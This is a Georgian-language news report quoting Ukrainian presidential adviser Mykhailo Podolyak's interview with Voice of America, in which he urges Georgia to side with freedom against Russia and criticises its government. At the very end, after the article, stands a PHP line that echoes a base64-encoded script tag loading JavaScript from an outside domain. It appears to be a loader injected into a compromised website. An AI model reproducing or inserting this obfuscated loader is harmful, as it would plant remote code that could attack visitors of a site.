celsiusi
ავერსი საქკაბელი
საქართველოს ჰქონდა არჩევანი, ან ირჩევთ თავისუფლების ღირებულებას, ან არ უჭერთ მხარს ავტოკრატიას, არავინ არ გთხოვთ უკრაინის გულისთვის მიიღოთ ესა თუ ის გადაწვეტილება, გთხოვენ რომ პირდაპირ თქვათ, თქვენ უნდა აირჩიოთ მხარს უჭერთ კაციჭამიებს თუ თავისუფლებას, აქ არ არსებობს რუხი ტონები, – ამის შესახებ უკრაინის პრეზიდენტის მრჩეველმა, მიხაილ პოდოლიაკმა „ამერიკის ხმასთან“ ინტერვიუში განაცხადა.
 
მისი თქმით, საქართველომ უნდა აირჩიოს, არის თუ არა სიკეთის მხარეს.
 
„საქართველოს ჰქონდა არჩევანი, ან ირჩევთ თავისუფლების ღირებულებას, ან არ უჭერთ მხარს ავტოკრატიას, არავინ არ გთხოვთ უკრაინის გულისთვის მიიღოთ ესა თუ ის გადაწვეტილება, გთხოვენ რომ პირდაპირ თქვათ. და არა მარტო გთხოვთ, ჩვენ ვფიქრობთ, რომ თითოეულმა ქვეყანამ უნდა გააკეთოს, გააზრებული არჩევანი, იმაზე თუ რა არის ისტორიულ პერსპექტივაში თქვენთვის მნიშვნელოვანი, თქვენ ან ხართ სიკეთის მხარეზე, ან იმ ქვეყნის მხარეზე, რომელიც მოვიდა სუვერენულ ტერიტორიაზე, რაც იხილა საქართველომ 2008 წელს თავად, თუმცა უფრო დიდი მასშტაბით, უფრო მეტი სისხლისღვრით და კაციჭამიაობით, და თქვენ უნდა აირჩიოთ მხარს უჭერთ კაციჭამიებს თუ თავისუფლებას, აქ არ არსებობს რუხი ტონები. საქართველომ ეს თავად უნდა გააკეთოს, საქმე არაა ჩვენს ზეწოლასა თუ ზეწოლის უქონლობაში. ისევე როგორც ევროპის ყველა სხვა ქვეყანამ, საქართველომ უნდა აირჩიოს, კაციჭამიები, თუ ადამიანები, ვინც თავს იცავენ. ხაზს გავუსვამ იმას, რაც ქართველებისთვის მნიშვნელოვანია, მათი ოჯახი, მათი ბავშვები. ჩვენ რუსეთის ტერიტორიაზე არ შევჭრილვართ, ჩვენ არავის ტერიტორიაზე არ შევჭრილვართ, ჩვენ ჩვენს ოჯახებს და სახლებს ვიცავთ. წარმოიდგინეთ თქვენს სახლში რომ შემოიჭრნენ და თქვენს თვალწინ თქვენს ბავშვებზე ან ცოლებზე იძალადონ. იდგებით და იტყვით, რომ მოდით არ ჩავერევი, ეს ხომ სისულელეა. ამას ხომ არ გავარჩევთ. ამიტომ ვითარება შავ-თეთრია, არ არსებობს რუხი ფერები, აირჩიეთ ან თეთრი ან შავი, სულ ესაა“, – განაცხადა პოდოლიაკმა.
 
მიხაილ პოდოლიაკის განცხადებით, ქართველებსა და უკრაინელებს თავისუფლებისკენ სწრაფვა აერთიანებთ.
 
„მე სიგიჟემდე მიყვარს ქართველი ხალხი. ამ ხალხს გულში აქვს ის, რაც უკრაინელ ხალხს – თავისუფლებისკენ სწრაფვა. არსებულ ვითარებაში ამ ხალხმა ვერ მიიღო ადეკვატური პოლიტიკური მოცემულობა. ქართული პოლიტიკური ელიტის მგავსი ქცევა კი მხოლოდ მათ ინფატილიზმზე მიუთითებს, და მის მოკლევადიან ხედვას უსვამს ხაზს, რადგან თუ მთელი მსოფლიო, ცივილიზებული სამყარო, რომელთანაც მგონი საქართველოს მთავრობას კვლავ აქვს სურვილი თანამშრომლობის, ამ ომს ერთმნიშვნელოვნად აფასებს, მის მოტივებს ხედავს და ამბობს, რომ უკრაინა გმირია ამ ომში, ამ ფონზე კი საქართველოს მთავრობა ცდილობს დაამციროს უკრაინის წინააღმდეგობის მთავრობის წევრები, ეს ცუდად გამოიყურება, მოკლევადიანად. ყველანაირი ტიპის რეპუტაციული ზიანზე, რაც საქართველოში პარტიებს თუ მის მთავრობას მიადგებათ, პასუხისმგებელი მხოლოდ საქართველოს ხელისუფლებაა. ვფიქრობ, რომ შუალედურ პერიოდში, მას არანაირი პერსპექტივა არ უწერია და შანსები არ აქვს, რადგან როგორც კი რუსეთი წააგებს, ყველა რეჟიმს და ხელისუფლებას მოეთხოვება პასუხი, კითხვაზე: როცა იდგა არჩევანი თავისუფლებასა და მკვლელების ღირებულებებს შორის, თქვენ მკვლელთა ღირებულებები რატომ აირჩიეთ. ეს ასე გამოიყურება. და მეორე: რაც შეეხება, პირად გამოძიებებს, ეს კომპრომატების გზაა და ამ გზას მხოლოდ რუსეთი იყენებს. რუსეთს უყვარს მოგონება პროპაგანდისტული მითების, ფილმების შეთხზვა და ვიღაცისგან ხალხის მტრის შექმნა. სწორედ ამ ორი მიზეზის გამოა, რომ მოქმედი საქართველოს მთავრობას უახლოეს მომავალში, სასაცილოდ იქცევა“, – განაცხადა პოდოლიაკმა.
 
ამასთან, მიხაილ პოდოლიაკი გამოეხმაურა განცხადებებს, რომ უკრაინულ მხარეს არ წარუდგენია არანაირი დამადასტურებელი დოკუმენტი, თითქოს საქართველოს მთავრობა რუსეთთან თანამშრომლობს.
 
„სამხილი შეიძლება, მხოლოდ იყოს იურიდიული. ის მიწოდებული იქნება საგარეო საქმეთა სამინისტროს ხაზით, თუ მსგავსი სამხილების წარდგენა საჭირო იქნება, მას სრული სახით წარადგენენ. დამიჯერეთ, ისევე, როგორც ევროპასა და ამერიკაში, ისევე ჩვენ ყველას ყურადღებით ვაკვირდებით, თუ რას აკეთებენ ესა თუ ის კერძო ბიზნესები თუ კომპანიები, რომლებიც სხვადასხვა იურისდიქციაში მოქმედებენ. ჩვენ ყველაფერს ამას ვსწავლობთ და საჭირო თუ იქნება იურიდიულ სამხილებს წარვადგენთ. ხვდებით, რომ არც ერთ პირს, როცა მთელი ცივილიზებული სამყარო სანქციებს აწესებს, არ მისცემენ საშუალებას, ამაზე ფული გააკეთოს. ეს ერთი და მეორე, რაც შეეხება ომში ჩართვას. საქართველო რა, არაა უკვე ომში? არ აქვს პრობლემა სამხრეთ ოსეთსა და აფხაზეთში? თუ ისინი ლამაზი რეიონებია, იქ ხომ კრიმინალური ანკლავებია“, – განაცხადა პოდოლიაკმა.
524
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");